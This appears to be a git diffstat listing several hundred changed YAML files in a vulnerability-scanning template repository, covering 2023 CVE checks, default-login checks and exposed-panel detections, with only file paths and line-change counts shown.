http/cves/2023/CVE-2023-22515.yaml | 21 +- http/cves/2023/CVE-2023-22620.yaml | 4 +- http/cves/2023/CVE-2023-2272.yaml | 2 +- http/cves/2023/CVE-2023-22897.yaml | 4 +- http/cves/2023/CVE-2023-23161.yaml | 2 +- http/cves/2023/CVE-2023-23333.yaml | 5 +- http/cves/2023/CVE-2023-23488.yaml | 4 +- http/cves/2023/CVE-2023-23489.yaml | 4 +- http/cves/2023/CVE-2023-23491.yaml | 4 +- http/cves/2023/CVE-2023-23492.yaml | 8 +- http/cves/2023/CVE-2023-2356.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 4 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24243.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24488.yaml | 4 +- http/cves/2023/CVE-2023-24489.yaml | 4 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 4 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-2479.yaml | 10 +- http/cves/2023/CVE-2023-25135.yaml | 4 +- http/cves/2023/CVE-2023-25157.yaml | 4 +- http/cves/2023/CVE-2023-25346.yaml | 2 +- http/cves/2023/CVE-2023-25573.yaml | 9 +- http/cves/2023/CVE-2023-25717.yaml | 4 +- http/cves/2023/CVE-2023-26067.yaml | 4 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-26360.yaml | 4 +- http/cves/2023/CVE-2023-26469.yaml | 4 +- http/cves/2023/CVE-2023-2648.yaml | 9 +- http/cves/2023/CVE-2023-26842.yaml | 2 +- http/cves/2023/CVE-2023-26843.yaml | 2 +- http/cves/2023/CVE-2023-27008.yaml | 2 +- http/cves/2023/CVE-2023-27034.yaml | 4 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27179.yaml | 4 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-2732.yaml | 4 +- http/cves/2023/CVE-2023-27350.yaml | 4 +- http/cves/2023/CVE-2023-27372.yaml | 4 +- http/cves/2023/CVE-2023-27482.yaml | 2 +- http/cves/2023/CVE-2023-27524.yaml | 4 +- http/cves/2023/CVE-2023-27587.yaml | 4 +- http/cves/2023/CVE-2023-2766.yaml | 11 +- http/cves/2023/CVE-2023-2780.yaml | 4 +- http/cves/2023/CVE-2023-2796.yaml | 6 +- http/cves/2023/CVE-2023-28121.yaml | 4 +- http/cves/2023/CVE-2023-2813.yaml | 10 +- http/cves/2023/CVE-2023-2822.yaml | 2 +- http/cves/2023/CVE-2023-2825.yaml | 4 +- http/cves/2023/CVE-2023-28343.yaml | 4 +- http/cves/2023/CVE-2023-28432.yaml | 4 +- http/cves/2023/CVE-2023-28665.yaml | 2 +- http/cves/2023/CVE-2023-29084.yaml | 4 +- http/cves/2023/CVE-2023-29298.yaml | 4 +- http/cves/2023/CVE-2023-29300.yaml | 4 +- http/cves/2023/CVE-2023-29357.yaml | 8 +- http/cves/2023/CVE-2023-29489.yaml | 4 +- http/cves/2023/CVE-2023-29622.yaml | 2 +- http/cves/2023/CVE-2023-29623.yaml | 4 +- http/cves/2023/CVE-2023-2982.yaml | 2 +- http/cves/2023/CVE-2023-29887.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 4 +- http/cves/2023/CVE-2023-29922.yaml | 4 +- http/cves/2023/CVE-2023-29923.yaml | 4 +- http/cves/2023/CVE-2023-30013.yaml | 10 +- http/cves/2023/CVE-2023-30019.yaml | 4 +- http/cves/2023/CVE-2023-30150.yaml | 4 +- http/cves/2023/CVE-2023-30210.yaml | 2 +- http/cves/2023/CVE-2023-30212.yaml | 4 +- http/cves/2023/CVE-2023-30256.yaml | 4 +- http/cves/2023/CVE-2023-30625.yaml | 12 +- http/cves/2023/CVE-2023-30777.yaml | 4 +- http/cves/2023/CVE-2023-30943.yaml | 14 +- http/cves/2023/CVE-2023-31059.yaml | 4 +- http/cves/2023/CVE-2023-31465.yaml | 8 +- http/cves/2023/CVE-2023-31548.yaml | 2 +- http/cves/2023/CVE-2023-32235.yaml | 2 +- http/cves/2023/CVE-2023-32243.yaml | 4 +- http/cves/2023/CVE-2023-32315.yaml | 4 +- http/cves/2023/CVE-2023-32563.yaml | 4 +- http/cves/2023/CVE-2023-33338.yaml | 4 +- http/cves/2023/CVE-2023-33405.yaml | 15 +- http/cves/2023/CVE-2023-33439.yaml | 4 +- http/cves/2023/CVE-2023-33440.yaml | 4 +- http/cves/2023/CVE-2023-3345.yaml | 4 +- http/cves/2023/CVE-2023-33510.yaml | 2 +- http/cves/2023/CVE-2023-33568.yaml | 2 +- http/cves/2023/CVE-2023-33831.yaml | 11 +- http/cves/2023/CVE-2023-34124.yaml | 4 +- http/cves/2023/CVE-2023-34192.yaml | 12 +- http/cves/2023/CVE-2023-34259.yaml | 4 +- http/cves/2023/CVE-2023-34362.yaml | 6 +- http/cves/2023/CVE-2023-34537.yaml | 2 +- http/cves/2023/CVE-2023-34598.yaml | 4 +- http/cves/2023/CVE-2023-34599.yaml | 4 +- http/cves/2023/CVE-2023-3460.yaml | 4 +- http/cves/2023/CVE-2023-34659.yaml | 4 +- http/cves/2023/CVE-2023-3479.yaml | 4 +- http/cves/2023/CVE-2023-34843.yaml | 4 +- http/cves/2023/CVE-2023-34960.yaml | 6 +- http/cves/2023/CVE-2023-35078.yaml | 4 +- http/cves/2023/CVE-2023-35082.yaml | 4 +- http/cves/2023/CVE-2023-35813.yaml | 8 +- http/cves/2023/CVE-2023-35843.yaml | 4 +- http/cves/2023/CVE-2023-35844.yaml | 2 +- http/cves/2023/CVE-2023-35885.yaml | 4 +- http/cves/2023/CVE-2023-36287.yaml | 2 +- http/cves/2023/CVE-2023-36289.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 3 +- http/cves/2023/CVE-2023-36844.yaml | 7 +- http/cves/2023/CVE-2023-36845.yaml | 12 +- http/cves/2023/CVE-2023-36934.yaml | 4 +- http/cves/2023/CVE-2023-37265.yaml | 4 +- http/cves/2023/CVE-2023-37266.yaml | 4 +- http/cves/2023/CVE-2023-37270.yaml | 4 +- http/cves/2023/CVE-2023-37462.yaml | 2 +- http/cves/2023/CVE-2023-37474.yaml | 11 +- http/cves/2023/CVE-2023-37580.yaml | 4 +- http/cves/2023/CVE-2023-37629.yaml | 8 +- http/cves/2023/CVE-2023-3765.yaml | 4 +- http/cves/2023/CVE-2023-38035.yaml | 5 +- http/cves/2023/CVE-2023-38205.yaml | 5 +- http/cves/2023/CVE-2023-3836.yaml | 4 +- http/cves/2023/CVE-2023-38433.yaml | 13 +- http/cves/2023/CVE-2023-38501.yaml | 5 + http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 5 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 4 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 11 +- http/cves/2023/CVE-2023-39598.yaml | 14 +- http/cves/2023/CVE-2023-39600.yaml | 11 +- http/cves/2023/CVE-2023-39676.yaml | 17 +- http/cves/2023/CVE-2023-39677.yaml | 18 +- http/cves/2023/CVE-2023-41642.yaml | 12 +- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 15 +- http/cves/2023/CVE-2023-42442.yaml | 15 +- http/cves/2023/CVE-2023-42793.yaml | 17 +- http/cves/2023/CVE-2023-43261.yaml | 17 +- http/cves/2023/CVE-2023-4451.yaml | 12 +- http/cves/2023/CVE-2023-4568.yaml | 4 +- http/cves/2023/CVE-2023-4634.yaml | 11 + http/cves/2023/CVE-2023-4714.yaml | 12 +- http/cves/2023/CVE-2023-5074.yaml | 10 +- .../3com/3com-nj2000-default-login.yaml | 2 +- .../UCMDB/ucmdb-default-login.yaml | 5 +- .../abb/cs141-default-login.yaml | 2 +- .../activemq/activemq-default-login.yaml | 2 +- .../default-logins/adminer-default-login.yaml | 4 +- .../default-logins/aem/aem-default-login.yaml | 3 +- .../default-logins/aem/aem-felix-console.yaml | 4 +- .../alibaba/canal-default-login.yaml | 2 +- .../alphaweb/alphaweb-default-login.yaml | 2 +- .../ambari/ambari-default-login.yaml | 3 +- .../apache/airflow-default-login.yaml | 5 +- .../apache/apisix-default-login.yaml | 2 +- .../apache/dubbo-admin-default-login.yaml | 2 +- .../apache/kafka-center-default-login.yaml | 1 - .../apache/karaf-default-login.yaml | 3 +- .../apache/kylin-default-login.yaml | 6 +- .../apache/tomcat-default-login.yaml | 4 +- .../apache/tomcat-examples-login.yaml | 11 +- .../apollo/apollo-default-login.yaml | 3 +- .../default-logins/arl/arl-default-login.yaml | 3 +- .../audiocodes/audiocodes-default-login.yaml | 4 +- .../azkaban/azkaban-default-login.yaml | 1 + .../bloofoxcms-default-login.yaml | 3 +- .../caimore/caimore-default-login.yaml | 2 +- .../chinaunicom-default-login.yaml | 2 +- .../cobbler/cobbler-default-login.yaml | 2 +- .../cobbler/hue-default-credential.yaml | 6 +- .../dlink-centralized-default-login.yaml | 4 +- .../datahub-metadata-default-login.yaml | 2 +- .../dataiku/dataiku-default-login.yaml | 2 +- .../dell/dell-idrac-default-login.yaml | 4 +- .../dell/dell-idrac9-default-login.yaml | 2 +- .../dell/emcecom-default-login.yaml | 5 +- .../digitalrebar-default-login.yaml | 4 +- .../druid/druid-default-login.yaml | 4 +- .../dvwa/dvwa-default-login.yaml | 4 +- .../easyreport/easyreport-default-login.yaml | 2 +- .../elasticsearch-default-login.yaml | 3 +- .../empire/empirec2-default-login.yaml | 9 +- .../emqx/emqx-default-login.yaml | 1 - .../esafenet-cdg-default-login.yaml | 7 +- .../exacqvision-default-login.yaml | 2 +- .../feiyuxing/feiyuxing-default-login.yaml | 2 +- .../flir/flir-default-login.yaml | 4 +- .../frps/frp-default-login.yaml | 3 +- .../fuelcms/fuelcms-default-login.yaml | 5 +- .../geoserver/geoserver-default-login.yaml | 6 +- .../gitlab/gitlab-weak-login.yaml | 1 - .../glpi/glpi-default-login.yaml | 5 +- .../google/google-earth-dlogin.yaml | 11 +- .../gophish/gophish-default-login.yaml | 6 +- .../grafana/grafana-default-login.yaml | 4 +- .../guacamole/guacamole-default-login.yaml | 2 +- .../hongdian/hongdian-default-login.yaml | 3 +- .../hp/hp-switch-default-login.yaml | 6 +- .../hybris/hybris-default-login.yaml | 6 +- .../ibm/ibm-mqseries-default-login.yaml | 2 +- .../ibm/ibm-storage-default-credential.yaml | 6 +- .../idemia-biometrics-default-login.yaml | 2 +- .../iptime/iptime-default-login.yaml | 2 +- .../jboss/jboss-jbpm-default-login.yaml | 6 +- .../jboss/jmx-default-login.yaml | 5 +- .../jenkins/jenkins-default.yaml | 4 +- .../jinher/jinher-oa-default-login.yaml | 6 +- .../kanboard-default-login.yaml | 4 +- .../kettle/kettle-default-login.yaml | 2 +- .../leostream/leostream-default-login.yaml | 4 +- .../lutron/lutron-default-login.yaml | 2 +- .../magnolia-default-login.yaml | 5 +- .../minio/minio-default-login.yaml | 6 +- .../mobotix/mobotix-default-login.yaml | 1 - .../mofi/mofi4500-default-login.yaml | 2 +- .../nacos/nacos-default-login.yaml | 7 +- .../nagios/nagios-default-login.yaml | 2 +- .../nagios/nagiosxi-default-login.yaml | 6 +- .../netsus/netsus-default-login.yaml | 1 + .../nexus/nexus-default-login.yaml | 3 +- .../default-logins/nps/nps-default-login.yaml | 4 +- .../nsicg/nsicg-default-login.yaml | 4 +- .../o2oa/o2oa-default-login.yaml | 4 +- .../octobercms/octobercms-default-login.yaml | 3 +- .../ofbiz/ofbiz-default-login.yaml | 3 +- .../openemr/openemr-default-login.yaml | 4 +- .../openmediavault-default-login.yaml | 4 +- .../businessintelligence-default-login.yaml | 2 +- .../oracle/peoplesoft-default-login.yaml | 6 +- .../others/aruba-instant-default-login.yaml | 5 +- .../others/ciphertrust-default-login.yaml | 5 +- .../others/cnzxsoft-default-login.yaml | 5 +- .../inspur-clusterengine-default-login.yaml | 2 +- .../others/kingsoft-v8-default-login.yaml | 4 +- .../others/opencats-default-login.yaml | 5 +- .../others/panabit-ixcache-default-login.yaml | 3 +- .../others/secnet-ac-default-login.yaml | 2 +- .../others/supershell-default-login.yaml | 5 +- .../others/telecom-gateway-default-login.yaml | 4 +- .../paloalto/panos-default-login.yaml | 2 +- .../panabit/panabit-default-login.yaml | 4 +- .../phpmyadmin/phpmyadmin-default-login.yaml | 5 +- .../powerjob-default-login.yaml | 4 +- .../pyload/pyload-default-login.yaml | 2 +- .../rabbitmq/rabbitmq-default-login.yaml | 4 +- .../rainloop/rainloop-default-login.yaml | 6 +- .../rancher/rancher-default-login.yaml | 4 +- .../ricoh/ricoh-weak-password.yaml | 2 +- .../riello/netman-default-login.yaml | 2 +- .../rockmongo/rockmongo-default-login.yaml | 3 +- .../rseenet/rseenet-default-login.yaml | 2 +- .../ruckus/ruckus-wireless-default-login.yaml | 4 +- .../samsung-printer-default-login.yaml | 2 +- .../samsung/samsung-wlan-default-login.yaml | 2 +- .../seeddms/seeddms-default-login.yaml | 2 +- .../seeyon/seeyon-a8-default-login.yaml | 2 +- .../seeyon/seeyon-monitor-default-login.yaml | 5 +- .../sequoiadb/sequoiadb-default-login.yaml | 2 +- .../showdoc/showdoc-default-login.yaml | 3 +- .../smartbi/smartbi-default-login.yaml | 9 +- .../solarwinds/solarwinds-default-login.yaml | 6 +- .../sonarqube/sonarqube-default-login.yaml | 3 +- .../spectracom/spectracom-default-login.yaml | 2 +- .../steve/steve-default-login.yaml | 7 +- .../supermicro/supermicro-default-login.yaml | 4 +- .../szhe/szhe-default-login.yaml | 3 +- .../tiny-file-manager-default-login.yaml | 6 +- .../tooljet/tooljet-default-login.yaml | 2 +- .../trassir/trassir-default-login.yaml | 4 +- .../versa/versa-default-login.yaml | 5 +- .../versa/versa-flexvnf-default-login.yaml | 5 +- .../vidyo/vidyo-default-login.yaml | 3 +- .../viewpoint/trilithic-viewpoint-login.yaml | 2 +- .../visionhub/visionhub-default-login.yaml | 2 +- http/default-logins/wayos/ac-weak-login.yaml | 8 +- .../weblogic/weblogic-weak-login.yaml | 6 +- http/default-logins/webmin-default-login.yaml | 5 +- .../wifisky/wifisky-default-login.yaml | 3 +- .../wildfly/wildfly-default-login.yaml | 4 +- .../wso2/wso2-default-login.yaml | 3 +- .../xerox/xerox7-default-login.yaml | 2 +- .../xnat/xnat-default-login.yaml | 2 +- .../xploitspy/xploitspy-default-login.yaml | 1 - http/default-logins/xui-weak-login.yaml | 5 +- .../xxljob/xxljob-default-login.yaml | 5 +- .../yealink/yealink-default-login.yaml | 6 +- .../zabbix/zabbix-default-login.yaml | 2 +- .../zmanda/zmanda-default-login.yaml | 2 +- .../3cx-phone-management-panel.yaml | 2 +- .../3cx-phone-webclient-management-panel.yaml | 2 +- http/exposed-panels/3g-wireless-gateway.yaml | 2 +- http/exposed-panels/acenet-panel.yaml | 2 +- http/exposed-panels/achecker-panel.yaml | 5 +- http/exposed-panels/acrolinx-dashboard.yaml | 2 +- http/exposed-panels/acti-panel.yaml | 4 +- .../exposed-panels/active-admin-exposure.yaml | 3 +- http/exposed-panels/activemq-panel.yaml | 2 +- http/exposed-panels/acunetix-login.yaml | 4 +- http/exposed-panels/acunetix-panel.yaml | 3 +- http/exposed-panels/addonfinance-portal.yaml | 2 +- http/exposed-panels/adiscon-loganalyzer.yaml | 6 +- http/exposed-panels/adminer-panel-detect.yaml | 8 +- http/exposed-panels/adminer-panel.yaml | 4 +- http/exposed-panels/adminset-panel.yaml | 1 + .../adobe/adobe-component-login.yaml | 1 + .../adobe/adobe-connect-central-login.yaml | 2 +- .../adobe/aem-crx-package-manager.yaml | 2 +- .../exposed-panels/adobe/aem-sling-login.yaml | 2 +- http/exposed-panels/advance-setup.yaml | 3 +- .../aircube-dashboard-panel.yaml | 4 +- http/exposed-panels/aircube-login.yaml | 4 +- http/exposed-panels/airflow-panel.yaml | 3 +- http/exposed-panels/airnotifier-panel.yaml | 4 +- http/exposed-panels/akamai-cloudtest.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/alienvault-usm.yaml | 1 + .../allied-telesis-exposure.yaml | 4 +- http/exposed-panels/ambari-exposure.yaml | 4 +- http/exposed-panels/ametys-admin-login.yaml | 2 +- .../exposed-panels/amp-application-panel.yaml | 5 +- http/exposed-panels/ampache-panel.yaml | 5 +- http/exposed-panels/ampps-admin-panel.yaml | 3 +- http/exposed-panels/ampps-panel.yaml | 3 +- http/exposed-panels/anaqua-login-panel.yaml | 5 +- .../ansible-tower-exposure.yaml | 4 +- .../apache-jmeter-dashboard.yaml | 4 +- .../apache/apache-mesos-panel.yaml | 5 +- .../apache/public-tomcat-manager.yaml | 2 +- http/exposed-panels/apiman-panel.yaml | 2 +- http/exposed-panels/appsmith-web-login.yaml | 4 +- http/exposed-panels/appspace-panel.yaml | 3 +- http/exposed-panels/appwrite-panel.yaml | 4 +- http/exposed-panels/aptus-panel.yaml | 2 +- .../exposed-panels/aqua-enterprise-panel.yaml | 4 +- .../arangodb-web-Interface.yaml | 2 +- http/exposed-panels/arcgis/arcgis-panel.yaml | 2 +- .../arcgis/arcgis-rest-api.yaml | 2 +- .../arcgis/arcgis-services.yaml | 76 +- http/exposed-panels/arcgis/arcgis-tokens.yaml | 60 +- .../archibus-webcentral-panel.yaml | 5 +- http/exposed-panels/arcserve-panel.yaml | 2 +- http/exposed-panels/arris-modem-detect.yaml | 4 +- http/exposed-panels/aspcms-backend-panel.yaml | 6 +- http/exposed-panels/aspect-control-panel.yaml | 4 +- http/exposed-panels/asus-aicloud-panel.yaml | 2 +- http/exposed-panels/asus-router-panel.yaml | 4 +- http/exposed-panels/atlantis-detect.yaml | 4 +- .../exposed-panels/atlassian-crowd-panel.yaml | 2 +- http/exposed-panels/audiobookshelf-panel.yaml | 3 +- http/exposed-panels/audiocodes-detect.yaml | 5 +- http/exposed-panels/avantfax-panel.yaml | 2 +- .../avatier-password-management.yaml | 1 + .../avaya/avayaaura-cm-panel.yaml | 4 +- .../avaya/avayaaura-system-manager-panel.yaml | 4 +- http/exposed-panels/avigilon-panel.yaml | 4 +- .../avtech-avn801-camera-panel.yaml | 8 +- http/exposed-panels/avtech-dvr-exposure.yaml | 3 +- http/exposed-panels/aws-ec2-autoscale.yaml | 4 +- http/exposed-panels/aws-opensearch-login.yaml | 4 +- http/exposed-panels/axel-webserver.yaml | 4 +- .../axway-api-manager-panel.yaml | 2 +- .../axway-securetransport-panel.yaml | 5 +- .../axway-securetransport-webclient.yaml | 4 +- http/exposed-panels/axxon-client-panel.yaml | 2 +- http/exposed-panels/azkaban-web-client.yaml | 1 + .../backpack/backpack-admin-panel.yaml | 4 +- http/exposed-panels/barracuda-panel.yaml | 2 +- http/exposed-panels/bazarr-login.yaml | 10 +- http/exposed-panels/bedita-panel.yaml | 2 +- .../exposed-panels/beego-admin-dashboard.yaml | 2 +- .../beyondtrust-login-server.yaml | 4 +- http/exposed-panels/beyondtrust-panel.yaml | 2 +- http/exposed-panels/bigant-login-panel.yaml | 2 +- http/exposed-panels/bigbluebutton-login.yaml | 2 +- http/exposed-panels/bigfix-login.yaml | 8 +- http/exposed-panels/bigip-rest-panel.yaml | 10 +- http/exposed-panels/biotime-panel.yaml | 5 +- .../bitdefender-gravityzone.yaml | 4 +- http/exposed-panels/bitrix-panel.yaml | 3 +- .../exposed-panels/bitwarden-vault-panel.yaml | 3 +- http/exposed-panels/black-duck-panel.yaml | 6 +- .../bloofoxcms-login-panel.yaml | 3 +- http/exposed-panels/blue-iris-login.yaml | 2 +- .../bmc/bmc-discovery-panel.yaml | 4 +- http/exposed-panels/bolt-cms-panel.yaml | 4 +- http/exposed-panels/bomgar-login-panel.yaml | 6 +- http/exposed-panels/bookstack-panel.yaml | 2 +- http/exposed-panels/buddy-panel.yaml | 3 +- http/exposed-panels/buildbot-panel.yaml | 5 +- http/exposed-panels/c2/brute-ratel-c4.yaml | 2 +- http/exposed-panels/c2/covenant-c2.yaml | 2 +- http/exposed-panels/c2/deimos-c2.yaml | 2 +- http/exposed-panels/c2/empire-c2.yaml | 4 +- http/exposed-panels/c2/evilginx.yaml | 6 +- http/exposed-panels/c2/hookbot-rat.yaml | 2 +- http/exposed-panels/c2/mystic-stealer.yaml | 4 +- http/exposed-panels/c2/mythic-c2.yaml | 2 +- http/exposed-panels/c2/nh-c2.yaml | 6 +- .../c2/rhadamanthys-stealer-panel.yaml | 3 +- http/exposed-panels/c2/viper-c2.yaml | 4 +- http/exposed-panels/cacti-panel.yaml | 5 +- http/exposed-panels/calendarix-panel.yaml | 5 +- http/exposed-panels/call-break-cms.yaml | 4 +- http/exposed-panels/camunda-login-panel.yaml | 6 +- http/exposed-panels/cas-login.yaml | 2 +- http/exposed-panels/casaos-panel.yaml | 5 +- http/exposed-panels/casdoor-login.yaml | 3 +- http/exposed-panels/casemanager-panel.yaml | 2 +- .../caton-network-manager-system.yaml | 4 +- http/exposed-panels/ccm-detect.yaml | 5 +- http/exposed-panels/centreon-panel.yaml | 2 +- http/exposed-panels/cerebro-panel.yaml | 4 +- .../checkmk/checkmarx-panel.yaml | 4 +- .../exposed-panels/checkmk/checkmk-login.yaml | 4 +- http/exposed-panels/checkpoint-panel.yaml | 7 +- .../checkpoint/ssl-network-extender.yaml | 2 +- .../cisco/cisco-ace-device-manager.yaml | 2 +- .../cisco/cisco-anyconnect-vpn.yaml | 4 +- .../exposed-panels/cisco/cisco-asa-panel.yaml | 4 +- http/exposed-panels/cisco/cisco-edge-340.yaml | 2 +- .../cisco/cisco-finesse-login.yaml | 11 +- .../cisco/cisco-integrated-login.yaml | 5 +- .../cisco/cisco-meraki-exposure.yaml | 4 +- .../cisco/cisco-onprem-panel.yaml | 5 +- .../cisco/cisco-prime-infrastructure.yaml | 2 +- http/exposed-panels/cisco/cisco-sd-wan.yaml | 5 +- .../exposed-panels/cisco/cisco-secure-cn.yaml | 2 +- .../cisco/cisco-secure-desktop.yaml | 4 +- http/exposed-panels/cisco/cisco-sendgrid.yaml | 2 +- .../cisco/cisco-systems-login.yaml | 2 +- .../cisco/cisco-telepresence.yaml | 5 +- .../cisco/cisco-ucs-kvm-login.yaml | 2 +- .../cisco/cisco-vmanage-login.yaml | 5 +- .../cisco/cisco-webvpn-detect.yaml | 5 +- .../citrix-adc-gateway-detect.yaml | 4 +- http/exposed-panels/citrix-vpn-detect.yaml | 5 +- .../claris-filemaker-webdirect.yaml | 10 +- http/exposed-panels/clave-login-panel.yaml | 5 +- .../clearpass-policy-manager.yaml | 2 +- http/exposed-panels/cloudpanel-login.yaml | 2 +- http/exposed-panels/cloudphysician-radar.yaml | 3 +- http/exposed-panels/cobbler-webgui.yaml | 3 +- http/exposed-panels/code-server-login.yaml | 5 +- http/exposed-panels/code42-panel.yaml | 4 +- .../codemeter-webadmin-panel.yaml | 4 +- http/exposed-panels/cofense-vision-panel.yaml | 2 +- .../coldfusion-administrator-login.yaml | 2 +- http/exposed-panels/compal-panel.yaml | 5 +- .../completeview-web-panel.yaml | 4 +- http/exposed-panels/concourse-ci-panel.yaml | 2 +- .../concrete5/concrete5-install.yaml | 3 +- .../concrete5/concrete5-panel.yaml | 2 +- http/exposed-panels/connect-box-login.yaml | 5 +- http/exposed-panels/contao-login-panel.yaml | 5 +- .../exposed-panels/content-central-login.yaml | 4 +- http/exposed-panels/contentkeeper-detect.yaml | 4 +- http/exposed-panels/corebos-panel.yaml | 4 +- http/exposed-panels/cortex-xsoar-login.yaml | 2 +- http/exposed-panels/couchdb-exposure.yaml | 4 +- http/exposed-panels/couchdb-fauxton.yaml | 4 +- http/exposed-panels/cpanel-api-codes.yaml | 5 +- http/exposed-panels/craftcms-admin-panel.yaml | 2 +- http/exposed-panels/creatio-login-panel.yaml | 4 +- http/exposed-panels/crontab-ui.yaml | 4 +- http/exposed-panels/crush-ftp-login.yaml | 5 +- http/exposed-panels/crxde-lite.yaml | 5 +- http/exposed-panels/cryptobox-panel.yaml | 3 +- http/exposed-panels/csod-panel.yaml | 5 +- http/exposed-panels/cudatel-panel.yaml | 4 +- http/exposed-panels/cvent-panel-detect.yaml | 4 +- http/exposed-panels/cwp-webpanel.yaml | 3 +- http/exposed-panels/cx-cloud-login.yaml | 4 +- .../cyberoam-ssl-vpn-panel.yaml | 6 +- http/exposed-panels/d-link-wireless.yaml | 5 +- .../darktrace-threat-visualizer.yaml | 4 +- http/exposed-panels/dashy-panel.yaml | 2 +- http/exposed-panels/datadog-login.yaml | 4 +- http/exposed-panels/dataiku-panel.yaml | 4 +- http/exposed-panels/davantis-panel.yaml | 4 +- http/exposed-panels/daybyday-panel.yaml | 3 +- http/exposed-panels/defectdojo-panel.yaml | 2 +- .../exposed-panels/dell-bmc-panel-detect.yaml | 4 +- http/exposed-panels/dell-idrac.yaml | 3 +- .../dell-openmanager-login.yaml | 2 +- http/exposed-panels/dell-wyse-login.yaml | 4 +- http/exposed-panels/delta-login-panel.yaml | 2 +- http/exposed-panels/deluge-webui-panel.yaml | 4 +- http/exposed-panels/dericam-login.yaml | 8 +- http/exposed-panels/digitalrebar-login.yaml | 5 +- .../directadmin-login-panel.yaml | 2 +- http/exposed-panels/directum-login.yaml | 2 +- http/exposed-panels/discuz-panel.yaml | 3 +- http/exposed-panels/django-admin-panel.yaml | 5 +- .../docebo-elearning-panel.yaml | 4 +- http/exposed-panels/dolibarr-panel.yaml | 2 +- http/exposed-panels/dotclear-panel.yaml | 2 +- http/exposed-panels/dotcms-admin-panel.yaml | 4 +- http/exposed-panels/dplus-dashboard.yaml | 4 +- http/exposed-panels/dqs-superadmin-panel.yaml | 4 +- http/exposed-panels/dradis-pro-panel.yaml | 4 +- .../drawio-flowchartmaker-panel.yaml | 5 +- http/exposed-panels/drone-ci-panel.yaml | 2 +- .../druid-console-exposure.yaml | 4 +- http/exposed-panels/druid-panel.yaml | 4 +- http/exposed-panels/drupal-login.yaml | 3 +- http/exposed-panels/dxplanning-panel.yaml | 2 +- http/exposed-panels/dynamicweb-panel.yaml | 2 +- http/exposed-panels/dynatrace-panel.yaml | 4 +- .../dzzoffice/dzzoffice-install.yaml | 2 +- .../dzzoffice/dzzoffice-panel.yaml | 5 +- http/exposed-panels/e-mobile-panel.yaml | 11 +- http/exposed-panels/eMerge-panel.yaml | 4 +- http/exposed-panels/earcu-panel.yaml | 3 +- http/exposed-panels/eclipse-birt-panel.yaml | 11 +- .../exposed-panels/ecosys-command-center.yaml | 4 +- http/exposed-panels/edgeos-login.yaml | 4 +- http/exposed-panels/efak-login-panel.yaml | 3 +- .../eko-management-console-login.yaml | 4 +- .../eko-software-update-panel.yaml | 2 +- .../elemiz-network-manager.yaml | 4 +- http/exposed-panels/emby-panel.yaml | 5 +- http/exposed-panels/emerson-power-panel.yaml | 2 +- http/exposed-panels/emessage-panel.yaml | 2 +- http/exposed-panels/ems-login-panel.yaml | 6 +- http/exposed-panels/ems-webclient-panel.yaml | 3 +- .../exposed-panels/entrust-identityguard.yaml | 4 +- http/exposed-panels/eos-http-browser.yaml | 4 +- http/exposed-panels/episerver-panel.yaml | 4 +- http/exposed-panels/epson-access-detect.yaml | 5 +- .../epson-projector-detect.yaml | 2 +- .../epson-web-control-detect.yaml | 2 +- http/exposed-panels/esphome-panel.yaml | 4 +- http/exposed-panels/esxi-system.yaml | 3 +- http/exposed-panels/eventum-panel.yaml | 6 +- http/exposed-panels/evlink/evlink-panel.yaml | 2 +- .../exposed-panels/evlink/evse-web-panel.yaml | 3 +- http/exposed-panels/ewm-manager-panel.yaml | 4 +- .../exposed-panels/exagrid-manager-panel.yaml | 5 +- http/exposed-panels/exolis-engage-panel.yaml | 6 +- http/exposed-panels/exposed-webalizer.yaml | 10 +- http/exposed-panels/extreme-netconfig-ui.yaml | 2 +- http/exposed-panels/extron-cms-panel.yaml | 4 +- http/exposed-panels/ez-publish-panel.yaml | 5 +- .../f-secure-policy-manager.yaml | 2 +- http/exposed-panels/faraday-login.yaml | 2 +- http/exposed-panels/fastapi-docs.yaml | 4 +- .../fastpanel-hosting-control-panel.yaml | 4 +- http/exposed-panels/fatpipe-ipvpn-panel.yaml | 4 +- http/exposed-panels/fatpipe-mpvpn-panel.yaml | 3 +- http/exposed-panels/fatpipe-warp-panel.yaml | 3 +- .../filebrowser-login-panel.yaml | 3 +- http/exposed-panels/fiori-launchpad.yaml | 4 +- http/exposed-panels/fiorilaunchpad-logon.yaml | 5 +- .../fireware-xtm-user-authentication.yaml | 3 +- .../flahscookie-superadmin-panel.yaml | 4 +- http/exposed-panels/flightpath-panel.yaml | 2 +- http/exposed-panels/flink-exposure.yaml | 4 +- http/exposed-panels/flip-cms-panel.yaml | 5 +- http/exposed-panels/flowci-panel.yaml | 4 +- .../flureedb-admin-console.yaml | 4 +- http/exposed-panels/footprints-panel.yaml | 4 +- .../exposed-panels/forcepoint-applicance.yaml | 2 +- http/exposed-panels/forcepoint.yaml | 5 +- http/exposed-panels/forti/fortiadc-panel.yaml | 4 +- .../fortinet/fortiap-panel.yaml | 4 +- .../fortinet/fortimail-panel.yaml | 2 +- .../fortinet/fortinet-fortiddos-panel.yaml | 3 +- .../fortinet/fortinet-fortigate-panel.yaml | 4 +- .../fortinet/fortinet-fortimanager-panel.yaml | 4 +- 